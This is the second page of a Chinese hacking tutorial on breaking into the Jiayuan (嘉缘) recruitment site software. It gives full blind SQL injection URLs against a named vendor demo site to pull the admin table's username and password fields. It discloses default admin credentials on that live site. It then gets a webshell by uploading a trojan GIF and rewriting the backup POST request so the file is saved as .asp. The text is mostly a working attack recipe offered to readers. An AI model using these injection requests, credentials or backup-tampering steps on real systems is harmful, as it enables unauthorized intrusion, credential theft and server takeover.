这个漏洞也是前一个版本中存在的,而且工具检测是实现不了的,下面我们就进行相应的SQL的猜数字游戏吧,这里就不截图了,为了照顾小菜,把相关的URL给列出来,如下:
判断表段:
http://demo.finereason.com/person/person_sendresume.asp?sendresume=1&sendemail=1@1.com&step=send&resumeid=273 and exists (select count(*) from job_admin)
判断字段:
http://demo.finereason.com/person/person_sendresume.asp?sendresume=1&sendemail=1@1.com&step=send&resumeid=273 and (select count(job_user) from job_admin)>0
http://demo.finereason.com/person/person_sendresume.asp?sendresume=1&sendemail=1@1.com&step=send&resumeid=273 and (select count(job_pass) from job_admin)>0
猜值的SQL语句就写出一个就好了,判断job_admin中job_user的第一位
http://demo.finereason.com/person/person_sendresume.asp?sendresume=1&sendemail=1@1.com&step=send&resumeid=273 and (select top 1 asc(mid(job_user,1,1)) from job_admin)>65
结果发现官方演示站点的后台就是默认的admin和admin888,后台如图3
有了后台,看看怎么获取webshell吧!首先我们看的就是备份数据库了,我们发现备份数据中表单数据是不能修改的,我想这些应该是难不到我们的吧!看看我的操作,首先是在前台上船一个
木马gif文件,然后在后台正常备份数据库抓包,修改post信息,主要修改如下:
原来数据:
(Content-Length: 117)
DBpath=%2Fdatabase%2Fjobcom.mdb&bkfolder=..%2FBackUp&bkDBname=20071216171500.mdb.bak&submit2=%B1%B8%B7%DD%CA%FD%BE%DD
修改后的:
(Content-Length: 133)
DBpath=%2FUpFiles%2FPerson%2F20071216171333.gif&bkfolder=..%2FBackUp&bkDBname=20071216171500.mdb.asp&submit2=%B1%B8%B7%DD%CA%FD%BE%DD
提交和获取的webshell 如图:
嘉缘这套系统在安全方面较以前的2.15版本可以说是有很很大的提高,不过还是由于程序员的小小疏忽造成了注入漏洞的形成!如果朋友们喜欢挖掘的话还可以继续深入!如果朋友们感兴趣的话可以来论坛中找我,我的ID是Cool_wXd.
上一页 [1] [2]
[图文]再次入侵嘉缘人才系统网站
您现在的位置: